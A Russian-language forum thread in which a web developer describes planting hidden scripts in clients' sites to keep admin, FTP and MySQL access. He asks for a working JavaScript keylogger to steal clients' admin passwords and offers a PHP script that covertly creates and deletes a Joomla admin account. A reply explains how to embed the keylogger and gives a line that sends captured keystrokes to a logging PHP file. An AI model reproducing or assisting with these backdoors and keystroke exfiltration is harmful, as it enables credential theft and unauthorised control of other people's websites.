Всем привет. Давненько не заходил. Но вот появился повод. Занимаюсь созданием сайтов и порядком надоело бороться с клиентами, поэтому разработал комплексную защиту от кидалова. Проще говоря пакет скриптов, раздающих возможность входа в админку, управление ftp и MySQL. Когда - то отказался от изучения JS, сейчас нет времени на это. Полный доступ я получаю через injection в базу своего аккаунта к админке. Но иногда назревают такие ситуации, когда клиент меняет хостера и возможность контролить его на 100% пропадает. Для того, чтобы решить эту проблему необходимо знать его реквизиты доступа в админку (частенько пароли клиенты не меняют, поэтому есть смысл ограничиться именно сбором, ибо грамотный админ не даст по тупому пройти). В итоге идельным решением стал кейлогер на JS. Но ни инфы, ни примеров в сети не нашел. За исключением вот этого http://www.hackzone.ru/forum/open/id/17441/ Но записанный код не пашет, как ни крути. В чем дело я не в курсе. В связи с чем очень большая просьба помочь с решением проблемы. З.Ы. - в ответку могу предложить скрипт на php, который создает и удаляет админа в Joomla через GET переменные. Сам берет все данные для подключения к базе и выполнения запросов. Удаляет, чтобы не палить присутствие.
У меня код с того сайта заработал. Тот, который в архиве - не пробовал. Правильно вставлял на страницу код?Надо так: <script type="text/javascript"> тут js </script> Еще должен быть правильно прописан путь к РНР файлу, который сохраняет всё в лог: new Image().src = 'test.php?keys='+keys; //в этой строчке пишем путь к файлу З.Ы. в такие скрипты нужно добавлять защиту.
Например постоянным обращением к файлу test.php можно сделать лог файл обьемом пару гигабайт. А еще если не использовать функцию flock() то можно вызвать ошибку.
